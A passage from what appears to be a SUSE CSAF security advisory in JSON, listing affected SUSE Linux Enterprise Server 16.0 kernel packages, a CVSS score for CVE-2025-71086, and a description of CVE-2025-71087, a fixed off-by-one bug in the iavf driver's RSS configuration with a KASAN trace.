"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71086"
},
{
"cve": "CVE-2025-71087",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71087"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niavf: fix off-by-one issues in iavf_config_rss_reg()\n\nThere are off-by-one bugs when configuring RSS hash key and lookup\ntable, causing out-of-bounds reads to memory [1] and out-of-bounds\nwrites to device registers.\n\nBefore commit 43a3d9ba34c9 (\"i40evf: Allow PF driver to configure RSS\"),\nthe loop upper bounds were:\n i \u003c= I40E_VFQF_{HKEY,HLUT}_MAX_INDEX\nwhich is safe since the value is the last valid index.\n\nThat commit changed the bounds to:\n i \u003c= adapter-\u003erss_{key,lut}_size / 4\nwhere `rss_{key,lut}_size / 4` is the number of dwords, so the last\nvalid index is `(rss_{key,lut}_size / 4) - 1`. Therefore, using `\u003c=`\naccesses one element past the end.\n\nFix the issues by using `\u003c` instead of `\u003c=`, ensuring we do not exceed\nthe bounds.\n\n[1] KASAN splat about rss_key_size off-by-one\n BUG: KASAN: slab-out-of-bounds in iavf_config_rss+0x619/0x800\n Read of size 4 at addr ffff888102c50134 by task kworker/u8:6/63\n\n CPU: 0 UID: 0 PID: 63 Comm: kworker/u8:6 Not tainted 6.18.0-rc2-enjuk-tnguy-00378-g3005f5b77652-dirty #156 PREEMPT(voluntary)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n Workqueue: iavf iavf_watchdog_task\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xb0\n print_report+0x170/0x4f3\n kasan_report+0xe1/0x1a0\n iavf_config_rss+0x619/0x800\n iavf_watchdog_task+0x2be7/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\n Allocated by task 63:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7f/0x90\n __kmalloc_noprof+0x246/0x6f0\n iavf_watchdog_task+0x28fc/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n\n The buggy address belongs to the object at ffff888102c50100\n which belongs to the cache kmalloc-64 of size 64\n The buggy address is located 0 bytes to the right of\n allocated 52-byte region [ffff888102c50100, ffff888102c50134)\n\n The buggy address belongs to the physical page:\n page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x102c50\n flags: 0x200000000000000(node=0|zone=2)\n page_type: f5(slab)\n raw: 0200000000000000 ffff8881000418c0 dead000000000122 0000000000000000\n raw: 0000000000000000 0000000080200020 00000000f5000000 0000000000000000\n page dumped because: kasan: bad access detected\n\n Memory state around the buggy address:\n ffff888102c50000: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n ffff888102c50080: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n \u003effff888102c50100: 00 00 00 00 00 00 04 fc fc fc fc fc fc fc fc fc\n ^\n ffff888102c50180: 00 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc\n ffff888102c50200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
